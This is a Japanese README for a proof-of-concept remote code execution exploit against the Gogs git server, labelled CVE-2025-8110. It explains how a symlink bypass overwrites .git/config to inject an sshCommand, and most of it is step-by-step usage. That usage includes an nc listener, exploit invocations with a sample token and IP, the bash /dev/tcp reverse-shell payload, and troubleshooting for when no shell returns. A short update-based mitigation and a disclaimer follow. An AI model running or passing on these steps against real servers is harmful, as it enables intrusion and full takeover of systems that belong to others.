
Gogs RCE PoC - CVE-2025-8110
CVE-2025-8110の概念実証 - シンボリックリンクバイパスとsshCommandインジェクションによるGogsでのリモートコード実行。
このエクスプロイトは、Gogs APIのシンボリックリンクバイパスを悪用して.git/configを上書きし、リバースシェルを実行する悪意のあるsshCommandを注入します。
git clone https://github.com/X4BROZER/CVE-2025-8110.git
cd CVE-2025-8110
pip install -r requirements.txt
引数 説明 -u, --url 対象Gogs URL (例: http://target:3000) -U, --username Gogsユーザー名 -P, --password Gogsパスワード -t, --token Gogs APIトークン -lh, --host リバースシェル用の自分のIP -lp, --port リスナー用のポート -x, --proxy プロキシを有効化 (localhost:8080)
Gogsにログイン → 設定 → アプリケーション → トークンを生成
nc -lvnp 4444
python3 exploit.py -u http://target:3000 -U <USERNAME GOGS> -P <PASSWORD GOGS> -t <TOKEN> -lh <ATTACKER IP> -lp <ATTACKER PORT>
python3 exploit.py -u http://localhost:3001 -U amine -P amine -t 44f4e64a1e6353f247050055aa0d3cc13b577ac3 -lh 10.10.17.134 -lp 4444
sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' # を注入トラブルシューティング 問題 解決策 ログイン失敗 ユーザー名/パスワードを確認 リポジトリ作成失敗 APIトークンを再生成 読み取りタイムアウト 正常 - リスナーを確認 シェルが返ってこない ファイアウォールを確認し、別のポートを試す
侵害指標(IoC)
対応策 Gogs v0.13.4以降にアップデート:
wget https://dl.gogs.io/v0.13.4/gogs_v0.13.4_linux_amd64.tar.gz
tar -xzf gogs_v0.13.4_linux_amd64.tar.gz
法的免責事項 このツールは教育目的および許可されたテストのみを目的としています。不正アクセスは違法です。
クレジット 発見: Wiz Research オリジナルPoC: zAbuQasem エクスプロイト: X4BROZER